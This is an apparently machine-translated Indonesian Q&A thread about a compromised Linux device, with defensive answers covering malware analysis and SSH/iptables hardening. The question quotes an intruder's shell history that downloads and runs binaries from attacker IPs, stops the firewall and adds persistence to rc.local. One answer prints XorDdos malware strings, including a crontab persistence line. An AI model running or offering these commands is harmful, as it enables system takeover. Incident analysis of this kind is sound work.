Pertanyaan Apakah saya baru saja diretas?


Saya mengembangkan produk konsumen, dan itu seharusnya terhubung ke Internet, jadi seperti yang diharapkan, itu terhubung ke Internet sehingga saya dapat mengembangkannya dengan tepat.

Saya pergi selama satu atau dua jam, dan ketika saya kembali ke kantor saya, saya melihat beberapa perintah aneh yang tertulis di terminal.

Melihat file log Linux yang disebut auth.log Saya dapat melihat baris berikut (di antara banyak lagi):

Feb  1 10:45:10 debian-armhf sshd[994]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=40.127.205.162  user=root
Feb  1 10:45:12 debian-armhf sshd[994]: Failed password for root from 40.127.205.162 port 37198 ssh2
Feb  1 10:45:12 debian-armhf sshd[994]: Received disconnect from 40.127.205.162: 11: Bye Bye [preauth]

Alamat IP 40.127.205.162 ternyata dimiliki oleh Microsoft.

Berikut ini beberapa perintah yang digunakan saat saya pergi:

  355  service iptables stop
  356  cd /tmp
  357  wget http://222.186.30.209:65534/yjz1
  358  chmod 0755 /tmp/yjz1
  359  nohup /tmp/yjz1 > /dev/null 2>&1 &
  360  chmod 777 yjz1
  361  ./yjz1
  362  chmod 0755 /tmp/yjz1
  363  nohup /tmp/yjz1 > /dev/null 2>&1 &
  364  chmod 0777 yjz1
  365  chmod u+x yjz1
  366  ./yjz1 &
  367  chmod u+x yjz1
  368  ./yjz1 &
  369  wget http://222.186.30.209:65534/yjz
  370  chmod 0755 /tmp/yjz
  371  nohup /tmp/yjz > /dev/null 2>&1 &
  372  chmod 777 yjz
  373  ./yjz
  374  chmod 0755 /tmp/yjz
  375  nohup /tmp/yjz > /dev/null 2>&1 &
  376  chmod u+x yjz
  377  ./yjz &
  378  chmod u+x yjz
  379  ./yjz &
  380  cd /tmp
  381  echo "cd  /tmp/">>/etc/rc.local
  382  service iptables stop
  383  cd /tmp
  384  wget http://222.186.30.209:65534/yjz1
  385  chmod 0755 /tmp/yjz1
  386  nohup /tmp/yjz1 > /dev/null 2>&1 &
  387  chmod 777 yjz1
  388  ./yjz1
  389  chmod 0755 /tmp/yjz1
  390  nohup /tmp/yjz1 > /dev/null 2>&1 &
  391  chmod u+x yjz1
  392  ./yjz1 &
  393  chmod 0777 yjz1
  394  ./yjz1 &
  395  echo "cd  /tmp/">>/etc/rc.local
  396  service iptables stop
  397  wget http://222.186.30.209:65534/yjz1
  398  chmod 0755 /root/yjz1
  399  nohup /root/yjz1 > /dev/null 2>&1 &
  400  chmod 777 yjz1
  401  ./yjz1
  402  chmod 0755 /root/yjz1
  403  nohup /root/yjz1 > /dev/null 2>&1 &
  404  chmod u+x yjz1
  405  ./yjz1 &
  406  chmod 0777 yjz1
  407  ./yjz1 &
  408  echo "cd  /root/">>/etc/rc.local
  409  cd /tmp
  410  service iptables stop
  411  wget http://222.186.30.209:65534/yjz1
  412  chmod 0755 /tmp/yjz1
  413  nohup /tmp/yjz1 > /dev/null 2>&1 &
  414  chmod 777 yjz1
  415  ./yjz1 &
  416  cd /etc
  417  echo "cd /root/">>/etc/rc.local
  418  echo "./yjz1&">>/etc/rc.local
  419  echo "./yjz1&">>/etc/rc.local
  420  echo "/etc/init.d/iptables stop">>/etc/rc.local
  421  cd /tmp
  422  service iptables stop
  423  wget http://222.186.30.209:65534/yjz1
  424  chmod 0755 /tmp/yjz1
  425  nohup /tmp/yjz1 > /dev/null 2>&1 &
  426  chmod 777 yjz1
  427  ./yjz1 &
  428  cd /etc
  429  echo "cd /root/">>/etc/rc.local
  430  echo "./yjz1&">>/etc/rc.local
  431  echo "./yjz1&">>/etc/rc.local
  432  echo "/etc/init.d/iptables stop">>/etc/rc.local
  433  cd /tmp
  434  service iptables stop
  435  wget http://222.186.30.209:65534/yjz1
  436  chmod 0755 /tmp/yjz1
  437  nohup /tmp/yjz1 > /dev/null 2>&1 &
  438  chmod 777 yjz1
  439  ./yjz1 &
  440  cd /etc
  441  echo "cd /root/">>/etc/rc.local
  442  echo "./yjz1&">>/etc/rc.local
  443  echo "./yjz1&">>/etc/rc.local
  444  echo "/etc/init.d/iptables stop">>/etc/rc.local
  445  service iptables stop
  446  wget http://222.186.30.209:65534/yjz1
  447  chmod 0755 /root/yjz1
  448  nohup /root/yjz1 > /dev/null 2>&1 &
  449  chmod 777 yjz1
  450  ./yjz1
  451  chmod 0755 /root/yjz1
  452  nohup /root/yjz1 > /dev/null 2>&1 &
  453  chmod 0777 yjz1
  454  chmod u+x yjz1
  455  ./yjz1 &
  456  chmod u+x yjz1
  457  ./yjz1 &

Dan banyak lagi:

  481  service iptables stop
  482  wget http://222.186.30.209:65534/yjz1
  483  chmod 0755 /root/yjz1
  484  nohup /root/yjz1 > /dev/null 2>&1 &
  485  chmod 777 yjz1
  486  ./yjz1
  487  chmod 0755 /root/yjz1
  488  nohup /root/yjz1 > /dev/null 2>&1 &
  489  chmod 0777 yjz1
  490  chmod u+x yjz1
  491  ./yjz1 &
  492  chmod u+x yjz1
  493  ./yjz1 &
  494  cd /tmp
  495  service iptables stop
  496  wget http://175.102.133.55:2/yjz
  497  ./yd_cd/make
  498  service iptables stop
  499  service iptables stop
  500  wget http://222.186.30.209:65534/yjz1

Saya sama sekali tidak menyadari hal ini. Bagaimana saya bisa mengamankan produk saya dengan benar?

Saya ingin memposting yang lengkap auth.log mengajukan. Bagaimana aku melakukan itu?

Juga, file itu yjz1 yang diunduh sepertinya adalah Trojan Linux dan semua ini tampaknya dilakukan oleh beberapa jenis kelompok peretas menurut http://anti-hacker-alliance.com/index.php?ip=40.127.205.162

Haruskah saya menelepon Microsoft dan berbicara dengan mereka? Apa yang harus saya lakukan?


483
2018-02-01 11:21


asal


Ya itu tidak terlihat terlalu bagus. Saya bukan ahli di Linux dengan cara apa pun, tetapi sesuatu pasti mencoba untuk mengeksekusi di sana. Saya tidak yakin bagaimana meskipun sepertinya ia mencoba masuk sebagai root dan gagal. Apakah ada catatan lain di auth.log Anda? Ada cara lain untuk admin jarak jauh? Saya telah melihat Mac dengan server VNC diaktifkan diretas sebelumnya melalui itu, meskipun ini terlihat seperti upaya SSH. Sepertinya IP yang diunduh dari host di China di suatu tempat. - Jonno
Anda dipaksa kasar. Inilah sebabnya mengapa seseorang tidak meninggalkan server ssh di internet, bahkan jika Anda memiliki kata sandi. Kekurangan apa pun dari autentikasi berbasis kunci tidak cukup aman akhir-akhir ini. - Journeyman Geek♦
Yah kita punya security.stackexchange.com. Tetapi hal pertama yang pertama: Tuan rumah yang dikompromikan tidak dapat dipercaya lagi. Lepaskan itu dari jaringan. Jika memungkinkan, buatlah cadangan sehingga Anda dapat meneliti apa yang telah dilakukan dan bagaimana hal itu dilakukan. Selanjutnya instal ulang OS dari sumber yang bersih. Pulihkan data dari cadangan. Amankan sistem jadi kamu tidak terinfeksi lagi. Mencari tahu bagaimana mereka masuk sangat dianjurkan. (Oleh karena itu rekomendasi untuk membuat salinan dari sistem yang terinfeksi). - Hennes
FYI: 40.127.205.162 adalah a Microsoft Azure Alamat IP menurut GeoIP. Akibatnya, Anda tidak dapat menyalahkan Microsoft atas serangan itu - ini setara dengan menyalahkan Amazon karena seseorang menggunakan EC2 untuk spam. Satu-satunya hal yang Microsoft benar-benar dapat lakukan adalah menendang para penyerang dari Azure, tetapi mereka akan kembali pada platform cloud yang berbeda dalam waktu singkat. - nneonneo
Bahkan, jika ini ditulis di terminal Anda, peretas mungkin duduk di bilik berikutnya. - isanae


Jawaban:


EDIT 2:

ada satu alasan bagus mengapa posting ini menarik begitu banyak perhatian: Anda berhasil merekam keseluruhan, sesi live dari penyusup di PC Anda. Ini sangat berbeda dari pengalaman sehari-hari kita, di mana kita berurusan dengan penemuan konsekuensi dari tindakannya dan mencoba untuk memperbaiki mereka. Di sini kita melihat dia di tempat kerja, melihat dia memiliki beberapa masalah dengan membangun backdoor, menelusuri kembali langkahnya, bekerja tergesa-gesa (mungkin karena dia duduk di meja Anda, seperti yang disarankan di atas, atau mungkin, dan menurut saya lebih mungkin, karena dia tidak dapat membuat program jahatnya berjalan di sistem, baca di bawah), dan coba untuk menerapkan instrumen kontrol mandiri sepenuhnya. Inilah yang disaksikan peneliti keamanan setiap hari dengan mereka perangkap madu. Bagi saya, ini adalah kesempatan yang sangat langka, dan sumber hiburan.


Anda sudah diretas. Bukti untuk ini tidak berasal dari potongan auth.log file yang Anda tampilkan, karena ini melaporkan upaya masuk yang gagal, terjadi dalam rentang waktu yang singkat (dua detik). Anda akan memperhatikan bahwa baris kedua menyatakan Failed password, sedangkan yang ketiga melaporkan a pre-auth putuskan: orang itu mencoba dan gagal.

Bukti datang bukan dari isi dari dua file http://222.186.30.209:65534/yjz dan http://222.186.30.209:65534/yjz1 penyerang yang diunduh ke sistem Anda.

Situs ini saat ini terbuka bagi siapa saja untuk mengunduhnya, yang saya lakukan. Saya pertama kali berlari file pada mereka, yang menunjukkan:

$ file y*
yjz:      ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
yjz1:     ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped

Lalu saya membawanya ke VM Debian 64-bit yang saya miliki; pemeriksaan konten mereka melalui strings perintah mengungkapkan banyak hal yang mencurigakan (mengacu pada berbagai serangan terkenal, ke perintah untuk diganti, skrip yang jelas digunakan untuk mengatur layanan baru, dan sebagainya).

Saya kemudian menghasilkan MD5-hashes dari kedua file, dan memberi mereka makan Cymru's database hash untuk melihat apakah mereka dikenal sebagai agen malware. Sementara yjztidak, yjz1 adalah, dan Cymru melaporkan kemungkinan deteksi oleh perangkat lunak anti-virus sebesar 58%. Ini juga menyatakan bahwa file ini terakhir dilihat sekitar tiga hari yang lalu, jadi ini cukup baru.

Lari clamscan (bagian dari clamav paket) pada dua file yang saya dapatkan:

$ clamscan y*
yjz: Linux.Backdoor.Gates FOUND
yjz1: Linux.Trojan.Xorddos FOUND

jadi kami sekarang yakin bahwa perangkat lunak Linux standar dapat mengidentifikasinya.

Apa yang harus anda lakukan? 

Meskipun agak baru, tidak ada sistem yang sangat baru, lihat artikel Jan. 2015 ini di XorDdos, contohnya. Jadi sebagian besar paket gratis harus dapat menghapusnya. Kamu harus mencobanya: clamav, rkhunter, chkrootkit. Saya telah Googled sekitar, dan melihat bahwa mereka mengklaim dapat menemukannya. Gunakan mereka untuk memeriksa karya pendahulunya, tetapi setelah menjalankan ketiga program ini Anda harus siap untuk pergi.

Untuk pertanyaan yang lebih besar, what should you do to prevent future infections, Jawaban Journeyman adalah langkah pertama yang baik. Ingatlah bahwa ini adalah perjuangan yang berkelanjutan, yang kita semua (termasuk saya!) Mungkin hilang tanpa menyadarinya.

EDIT:

Atas permintaan Viktor Toth (tidak langsung), saya ingin menambahkan beberapa komentar. Memang benar bahwa penyusup mengalami beberapa kesulitan: ia mengunduh dua alat peretasan yang berbeda, mengubah izinnya beberapa kali, merestartnya beberapa kali, dan mencoba berkali-kali untuk menonaktifkan firewall. Sangat mudah untuk menebak apa yang terjadi: ia mengharapkan alat peretasannya untuk membuka saluran komunikasi ke salah satu PC yang terinfeksi (lihat nanti), dan, ketika dia tidak melihat saluran baru ini muncul di kontrolnya GUI, takut peretasannya alat sedang diblokir oleh firewall, jadi dia mengulangi prosedur instalasi. Saya setuju dengan Viktor Toth bahwa tahap khusus dari operasi ini tampaknya tidak membawa buah yang diharapkan, tetapi saya ingin mendorong Anda sangat kuat jangan meremehkan tingkat kerusakan yang ditimbulkan pada pc Anda.

Saya berikan di sini sebagian output strings yjz1:

etc/init.d/%s
/etc/rc%d.d/S90%s
--del
chkconfig
remove
update-rc.d
/etc/cron.hourly/gcc4.sh
/etc/rc.d/rc%d.d/S90%s
--add
defaults
/proc/%d/exe
/proc/self/exe
HOME=/
MYSQL_HISTFILE=/dev/null
#!/bin/sh
# chkconfig: 12345 90 90
# description: %s
### BEGIN INIT INFO
# Provides:             %s
# Required-Start:
# Required-Stop:
# Default-Start:        1 2 3 4 5
# Default-Stop:
# Short-Description:    %s
### END INIT INFO
case $1 in
start)
stop)
esac
sed -i '/\/etc\/cron.hourly\/gcc4.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc4.sh' >> /etc/crontab
etc/init.d/%s
GET %s HTTP/1.1
%sHost: %s
POST %s HTTP/1.1
%sHost: %s
Content-Type: application/x-www-form-urlencoded
Content-Length: %d
%s%s
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1;      TencentTraveler ; .NET CLR 1.1.4322)
Connection: Keep-Alive

Ini memberikan bukti merusak layanan (dalam /etc/init.d dan masuk /etc/rc.d), dengan crontab, dengan file riwayat mysql, dan beberapa file dalam proc yang merupakan tautan ke bash (yang menunjukkan versi curang yang dibuat khusus dari cangkang Anda telah ditanam). Kemudian program ini menghasilkan permintaan HTTP (ke situs berbahasa Cina,

 Accept-Language: zh-cn

yang memberikan substansi komentar David Schwartz di atas), yang dapat menciptakan lebih banyak kekacauan. Dalam permintaan, binari (Content-Type: application/x-www-form-urlencoded) harus diunduh ke PC yang diserang (GET) dan diunggah ke mesin pengontrol (POST). Saya tidak dapat menentukan apa yang akan diunduh ke pc yang diserang, tetapi, mengingat ukuran kecil keduanya yjz dan yjz1 (1.1MB dan 600kB, secara repectively), saya dapat menduga bahwa sebagian besar file diperlukan untuk menyelundupkan rootkit, yaitu versi yang diubah dari ls, netstat, ps, ifconfig, ..., akan diunduh dengan cara ini. Dan ini akan menjelaskan upaya penyerang yang mencoba untuk mendapatkan unduhan ini.

Tidak ada kepastian bahwa hal-hal di atas menghabiskan semua kemungkinan: kita pasti kekurangan bagian dari transkrip (antara garis 457 dan 481) dan kita tidak melihat keluar; lebih jauh lagi, terutama yang mengkhawatirkan adalah garis 495-497,

cd /tmp;  ./yd_cd/make

yang merujuk ke file yang tidak kami lihat diunduh, dan yang mana mungkin menjadi kompilasi: jika demikian, itu berarti penyerang telah (akhirnya?) mengerti apa masalah dengan executable-nya, dan sedang mencoba untuk memperbaikinya, dalam hal ini pc yang diserang telah pergi untuk selamanya. [Bahkan, dua versi malware yang diserang oleh penyerang ke mesin yang diretas (dan saya masuk ke 64bit Debian VM) untuk arsitektur yang tidak sesuai, x86, sedangkan hanya nama komputer yang diretas yang memberikan fakta bahwa dia berurusan dengan arsitektur lengan].

Alasan mengapa saya menulis suntingan ini adalah untuk mendesak Anda sekuat mungkin untuk menyisir sistem Anda dengan instrumen profesional, atau menginstal ulang dari awal.

Dan, omong-omong, apakah ini terbukti bermanfaat bagi siapa saja, ini adalah daftar dari 331 Alamat IP yang mana yjz mencoba untuk terhubung. Daftar ini sangat besar (dan mungkin ditakdirkan untuk menjadi lebih besar) yang saya percaya ini adalah alasan untuk merusak mysql. Daftar yang disediakan oleh backdoor lainnya adalah identik, yang, saya kira, adalah alasan untuk meninggalkan begitu banyak informasi penting di tempat terbuka (saya berpikir penyerang tidak ingin membuat upaya untuk menyimpannya dalam format kernel, jadi dia memasukkan seluruh daftar dalam file teks-jelas, yang mungkin dibaca oleh semua backdoor-nya, untuk OS mana pun):

61.132.163.68
202.102.192.68
202.102.213.68
202.102.200.101
58.242.2.2
202.38.64.1
211.91.88.129
211.138.180.2
218.104.78.2
202.102.199.68
202.175.3.3
202.175.3.8
202.112.144.30
61.233.9.9
61.233.9.61
124.207.160.110
202.97.7.6
202.97.7.17
202.106.0.20
202.106.46.151
202.106.195.68
202.106.196.115
202.106.196.212
202.106.196.228
202.106.196.230
202.106.196.232
202.106.196.237
202.112.112.10
211.136.17.107
211.136.28.231
211.136.28.234
211.136.28.237
211.147.6.3
219.141.136.10
219.141.140.10
219.141.148.37
219.141.148.39
219.239.26.42
221.130.32.100
221.130.32.103
221.130.32.106
221.130.32.109
221.130.33.52
221.130.33.60
221.176.3.70
221.176.3.73
221.176.3.76
221.176.3.79
221.176.3.83
221.176.3.85
221.176.4.6
221.176.4.9
221.176.4.12
221.176.4.15
221.176.4.18
221.176.4.21
58.22.96.66
218.104.128.106
202.101.98.55
211.138.145.194
211.138.151.161
211.138.156.66
218.85.152.99
218.85.157.99
222.47.29.93
202.101.107.85
119.233.255.228
222.47.62.142
122.72.33.240
211.98.121.27
218.203.160.194
221.7.34.10
61.235.70.98
113.111.211.22
202.96.128.68
202.96.128.86
202.96.128.166
210.21.3.140
210.21.4.130
211.95.193.97
211.98.2.4
211.98.4.1
211.162.61.225
211.162.61.235
211.162.61.255
211.162.62.1
211.162.62.60
221.4.66.66
202.103.176.22
202.96.144.47
210.38.192.33
202.96.134.33
202.96.134.133
202.96.154.15
210.21.196.6
221.5.88.88
202.103.243.112
202.193.64.33
61.235.164.13
61.235.164.18
202.103.225.68
221.7.136.68
202.103.224.68
211.97.64.129
211.138.240.100
211.138.242.18
211.138.245.180
221.7.128.68
222.52.118.162
202.98.192.67
202.98.198.167
211.92.136.81
211.139.1.3
211.139.2.18
202.100.192.68
211.97.96.65
211.138.164.6
221.11.132.2
202.100.199.8
202.99.160.68
202.99.166.4
202.99.168.8
222.222.222.222
202.102.224.68
202.102.227.68
222.85.85.85
222.88.88.88
210.42.241.1
202.196.64.1
112.100.100.100
202.97.224.68
219.235.127.1
61.236.93.33
211.93.24.129
211.137.241.34
219.147.198.230
202.103.0.68
202.103.0.117
202.103.24.68
202.103.44.150
202.114.0.242
202.114.240.6
211.161.158.11
211.161.159.3
218.104.111.114
218.104.111.122
218.106.127.114
218.106.127.122
221.232.129.30
59.51.78.210
61.234.254.5
202.103.96.112
219.72.225.253
222.243.129.81
222.246.129.80
211.142.210.98
211.142.210.100
220.168.208.3
220.168.208.6
220.170.64.68
218.76.192.100
61.187.98.3
61.187.98.6
202.98.0.68
211.93.64.129
211.141.16.99
202.98.5.68
219.149.194.55
211.138.200.69
202.102.3.141
202.102.3.144
58.240.57.33
112.4.0.55
114.114.114.114
114.114.115.115
202.102.24.34
218.2.135.1
221.6.4.66
221.131.143.69
202.102.8.141
222.45.0.110
61.177.7.1
218.104.32.106
211.103.13.101
221.228.255.1
61.147.37.1
222.45.1.40
58.241.208.46
202.102.9.141
202.102.7.90
202.101.224.68
202.101.226.68
211.141.90.68
211.137.32.178
202.96.69.38
211.140.197.58
219.149.6.99
202.96.86.18
101.47.189.10
101.47.189.18
118.29.249.50
118.29.249.54
202.96.64.68
202.96.75.68
202.118.1.29
202.118.1.53
219.148.204.66
202.99.224.8
202.99.224.67
211.90.72.65
211.138.91.1
218.203.101.3
202.100.96.68
211.93.0.81
222.75.152.129
211.138.75.123
202.102.154.3
202.102.152.3
219.146.1.66
219.147.1.66
202.102.128.68
202.102.134.68
211.138.106.19
211.90.80.65
202.99.192.66
202.99.192.68
61.134.1.4
202.117.96.5
202.117.96.10
218.30.19.40
218.30.19.50
116.228.111.118
180.168.255.18
202.96.209.5
202.96.209.133
202.101.6.2
211.95.1.97
211.95.72.1
211.136.112.50
211.136.150.66
119.6.6.6
124.161.97.234
124.161.97.238
124.161.97.242
61.139.2.69
202.98.96.68
202.115.32.36
202.115.32.39
218.6.200.139
218.89.0.124
61.139.54.66
61.139.39.73
139.175.10.20
139.175.55.244
139.175.150.20
139.175.252.16
168.95.1.1
210.200.211.193
210.200.211.225
211.78.130.1
61.31.1.1
61.31.233.1
168.95.192.1
168.95.192.174
61.60.224.3
61.60.224.5
202.113.16.10
202.113.16.11
202.99.96.68
202.99.104.68
211.137.160.5
211.137.160.185
219.150.32.132
202.98.224.68
211.139.73.34
61.10.0.130
61.10.1.130
202.14.67.4
202.14.67.14
202.45.84.58
202.45.84.67
202.60.252.8
202.85.128.32
203.80.96.9
203.142.100.18
203.142.100.21
203.186.94.20
203.186.94.241
221.7.1.20
61.128.114.133
61.128.114.166
218.202.152.130
61.166.150.123
202.203.128.33
211.98.72.7
211.139.29.68
211.139.29.150
211.139.29.170
221.3.131.11
222.172.200.68
61.166.150.101
61.166.150.139
202.203.144.33
202.203.160.33
202.203.192.33
202.203.208.33
202.203.224.33
211.92.144.161
222.221.5.240
61.166.25.129
202.96.103.36
221.12.1.227
221.130.252.200
222.46.120.5
202.96.96.68
218.108.248.219
218.108.248.245
61.130.254.34
60.191.244.5
202.96.104.15
202.96.104.26
221.12.33.227
202.96.107.27
61.128.128.68
61.128.192.68
218.201.17.2
221.5.203.86
221.5.203.90
221.5.203.98
221.7.92.86
221.7.92.98

Kode berikut

 #!/bin/bash
 echo 0 > out
 while read i; do
       whois $i | grep -m 1 -i country >> out
 done < filename
 cat out | grep -i cn | wc -l

pada daftar di atas menunjukkan itu 302 keluar dari total 331 alamat di Cina daratan, yang sisanya berada di Hong Kong, Mongolia, Taiwan. Ini menambah dukungan lebih lanjut terhadap pendapat David Schwartz bahwa ini sebagian besar adalah cincin bot Cina.

EDIT 3

Atas permintaan @ vaid (penulis OP, baca komentarnya di bawah), saya akan menambahkan komentar tentang cara memperkuat keamanan sistem Linux dasar (untuk sistem yang menyediakan banyak layanan, ini adalah topik yang jauh lebih rumit). vaid menyatakan dia melakukan hal berikut:

  1. Instal ulang sistem

  2. mengubah kata sandi root menjadi kata sandi panjang 16 karakter dengan huruf dan karakter campuran dan huruf besar dan kecil.

  3. Mengubah nama pengguna menjadi 6 nama pengguna panjang campuran dan menerapkan kata sandi yang sama seperti yang digunakan untuk root

  4. mengubah port SSH menjadi sesuatu di atas 5000

  5. mematikan SSH root login.

Ini bagus (kecuali saya menggunakan port di atas 10.000 karena banyak program yang berguna menggunakan port di bawah 10.000). Tapi Saya tidak dapat cukup menekankan kebutuhan untuk menggunakan kunci kriptografi untuk login ssh, bukan kata sandi. Saya akan memberi Anda contoh pribadi. Di salah satu VPS saya, saya tidak yakin apakah akan mengganti port ssh; Saya meninggalkannya pada 22, tetapi menggunakan kunci crypto untuk otentikasi. Saya punya ratusan upaya break-in per hari, tidak ada yang berhasil. Ketika, lelah untuk memeriksa setiap hari bahwa tidak ada yang berhasil, saya akhirnya mengalihkan port ke sesuatu di atas 10.000, upaya break-in menjadi nol. Pikiran Anda, bukan bahwa hacker itu bodoh (mereka tidak!), Mereka hanya memburu mangsa yang lebih mudah.

Sangat mudah untuk mengaktifkan kunci crypto dengan RSA sebagai algoritme tanda tangan, lihat komentar di bawah ini oleh Jan Hudec (terima kasih!):

 cd; mkdir .ssh; chmod 700 .ssh; cd .ssh; ssh-keygen -t rsa (then hit <kbd>ENTER>/kbd> three times); cat id_rsa.pub >> authorized_keys; chmod 600 *

Sekarang yang harus Anda lakukan hanyalah menyalin file id_rsa ke mesin dari mana Anda ingin terhubung (dalam direktori .sshjuga chmod'ed to 700), kemudian jalankan perintah

ssh -p YourChosenNonStandardPort -i ~/.ssh/id_rsa me@RemoteMachine

Ketika Anda yakin ini berfungsi, edit pada server (= mesin yang ingin Anda sambungkan) file tersebut /etc/ssh/sshd_config, dan ubah garisnya

#PasswordAuthentication yes

untuk

PasswordAuthentication no

dan nyalakan kembali ssh layanan (service ssh restart atau systemctl restart ssh, atau sesuatu seperti ini, tergantung pada distro).

Ini akan bertahan lama. Bahkan, saat ini tidak ada eksploitasi yang diketahui terhadap versi saat ini openssh v2, dan RSA sebagaimana dipekerjakan oleh openssh v2.

Terakhir, untuk benar-benar menurunkan komputer Anda, Anda perlu mengkonfigurasi firewall (netfilter / iptables) sebagai berikut:

 iptables -A INPUT -p tcp --dport YourChosenNonStandardPort -j ACCEPT
 iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
 iptables -P INPUT DROP
 iptables -P OUTPUT ACCEPT
 iptables -A INPUT -i lo -j ACCEPT
 iptables -A OUTPUT -o lo -j ACCEPT

Ini, 1) memungkinkan koneksi ssh dari LAN dan WAN, 2) memungkinkan semua input yang berasal dari permintaan Anda (misalnya, ketika Anda memuat halaman Web), 3) menjatuhkan segala sesuatu yang lain pada input, 4) memungkinkan semuanya di output, dan 5-6) memungkinkan semuanya pada antarmuka loopback.

Seiring kebutuhan Anda bertambah, dan lebih banyak port perlu dibuka, Anda dapat melakukannya dengan menambahkan, di bagian atas daftar, aturan seperti:

 iptables -A INPUT -p tcp --dport 80 -j ACCEPT

untuk memungkinkan orang-orang misalnya untuk mengakses browser Web Anda.


479
2018-02-01 16:05



Ini bagus untuk dibaca. Saya juga mencoba file tersebut yjz1 melalui Googles VirusTotal.com yang memberi positif. Aku bahkan tidak melihatnya yjztelah diunduh. Terima kasih. - vaid
Hati-hati berlari strings pada data yang tidak tepercaya. lcamtuf.blogspot.com/2014/10/… - Matt Nordhoff
@MattNordhoff Terima kasih telah menunjukkan ini, saya tidak sadar akan hal itu. Namun, pada Debian saya, perintah 'string' melewatkan tes yang Anda kaitkan dengan warna terbang. Saya kira ini adalah karena fakta bahwa negara manual: -a ... Biasanya ini adalah perilaku default. Tepuk tangan. - MariusMatutiae
Jawaban ini menunjukkan pendekatan yang seharusnya menjadi paradigma: 1. Jangan biarkan perhatian Anda teralihkan oleh upaya yang gagal, waspada. 2. Susun tindakan sukses penyerang. 3. Pelajari apa dan bagaimana penyerang melakukannya. 4. Instal semua dari awal atau dari cadangan terakhir yang tidak rusak (diserang), tambahkan perlindungan tambahan yang diperlukan yang Anda temukan (poin 3). 5. Bantu yang lain untuk melindungi diri mereka sendiri (daftar IP yang dikompromikan / dicurigai). - Hastur
[Dimatikan setelah komentar oleh @MariusMatutiae] - Namun demikian, OP harus menyadari bahwa pada sistem yang disusupi, setiap dapat dieksekusi harus dianggap jahat, bahkan shell, ls, who atau sesuatu yang lain. "Menyimpan data" dengan menggunakan eksekusi apa pun pada sistem yang disusupi (mis. scp atau rsync) mungkin kompromi lebih banyak mesin. - Dubu


Selamat datang di Internet - di mana setiap server SSH yang terbuka kemungkinan akan diperiksa, dipaksa secara brutal, dan memiliki berbagai penghinaan yang ditimpakan padanya.

Untuk memulai, Anda harus benar-benar menghapus penyimpanan pada produk. Bayangkan jika Anda ingin menyebarkannya untuk forensik, tetapi pemasangan Linux di atasnya sekarang dicurigai.

Sedikit menebak tetapi

  1. Anda dipaksa kasar atau gunakan kata sandi umum. Ini keamanan oleh ketidakjelasan tetapi Anda tidak ingin kata sandi kamus atau untuk menggunakan akun root terbuka untuk SSH. Nonaktifkan akses SSH root jika opsi atau setidaknya mengubah nama sehingga mereka perlu menebak keduanya. SSHing sebagai root adalah praktek keamanan yang mengerikan. Jika Anda harus menggunakan root, masuk sebagai pengguna lain dan gunakan su atau sudo untuk beralih.

  2. Tergantung pada produk, Anda mungkin ingin mengunci akses SSH dalam beberapa cara. Total lock-down terdengar seperti ide yang bagus, dan memungkinkan pengguna untuk membukanya sesuai kebutuhan. Tergantung pada sumber daya apa yang dapat Anda simpan, pertimbangkan hanya mengizinkan alamat IP di subnet Anda sendiri, atau semacam sistem pembatas masuk. Jika Anda tidak membutuhkannya pada produk akhir pastikan itu dimatikan.

  3. Gunakan port yang tidak standar. Keamanan dengan ketidakjelasan lagi, tetapi itu berarti penyerang perlu menargetkan port Anda.

  4. Jangan pernah menggunakan kata sandi default. Pendekatan terbaik yang pernah saya lihat adalah secara acak menghasilkan kata sandi untuk perangkat tertentu dan mengirimkannya dengan produk Anda. Praktik terbaik adalah otentikasi berbasis kunci, tetapi saya tidak tahu bagaimana Anda akan mendekati itu pada produk pasar massal.


140
2018-02-01 13:24



5. Gunakan auth kunci publik jika memungkinkan. Autentikasi kata sandi jauh, jauh kurang aman. - Bob
Ya, tetapi jika ini adalah perangkat konsumen, itu mungkin bukan pilihan. Pada kotak dev, itu terdengar seperti ide yang brilian. Di server, baik, saya diretas sebelumnya; p - Journeyman Geek♦
Jika perangkat konsumen maka kata sandi acak yang sama atau kunci pada semua dari mereka juga merupakan ide yang buruk. Seperti apa pun berdasarkan nomor seri, MAC-nya atau informasi lain yang dapat diidentifikasi. (Sesuatu yang banyak dilewatkan oleh modem / router / WAP SoHO). - Hennes
Ini adalah perangkat konsumen. Namun, sebagian besar konsumen yang ditargetkan tidak akan cukup terdidik untuk mengetahui apa SSH. Jadi SSH dapat dimatikan dan kemungkinan besar akan dimatikan. - vaid
Juga, gunakan fail2ban. - Shadur


Oh, kamu sudah diretas. Seseorang tampaknya telah mendapatkan kredensial root dan mencoba mengunduh Trojan ke sistem Anda. MariusMatutiae memberikan analisis payload.

Dua pertanyaan muncul: a) Apakah penyerang berhasil? Dan b) apa yang bisa Anda lakukan?

Jawaban atas pertanyaan pertama mungkin menjadi tidak. Perhatikan bagaimana penyerang berulang kali mencoba mengunduh dan menjalankan payload, tampaknya tidak berhasil. Saya menduga bahwa sesuatu (SELinux, barangkali?) Menghalangi jalannya.

BAGAIMANA: Penyerang juga mengubah Anda /etc/rc.d/rc.local file, dengan harapan bahwa ketika Anda me-restart sistem Anda, payload akan diaktifkan. Jika Anda belum memulai ulang sistem, jangan mulai ulang hingga Anda telah menghapus perubahan ini /etc/rc.d/rc.local. Jika Anda sudah memulai kembali ... baik, sial.

Mengenai apa yang dapat Anda lakukan: Hal yang paling aman untuk dilakukan adalah menghapus sistem dan menginstal ulang dari awal. Tapi ini tidak selalu menjadi pilihan. Hal yang kurang aman untuk dilakukan adalah menganalisis secara persis apa yang terjadi dan menghapus setiap jejaknya, jika Anda bisa. Sekali lagi, jika Anda belum me-restart sistem, mungkin semua yang dibutuhkan bersih /etc/rc.d/rc.local, hapus semua yang diunduh oleh penyerang, dan yang terakhir tetapi tidak kalah penting, ubah kata sandi sialan!

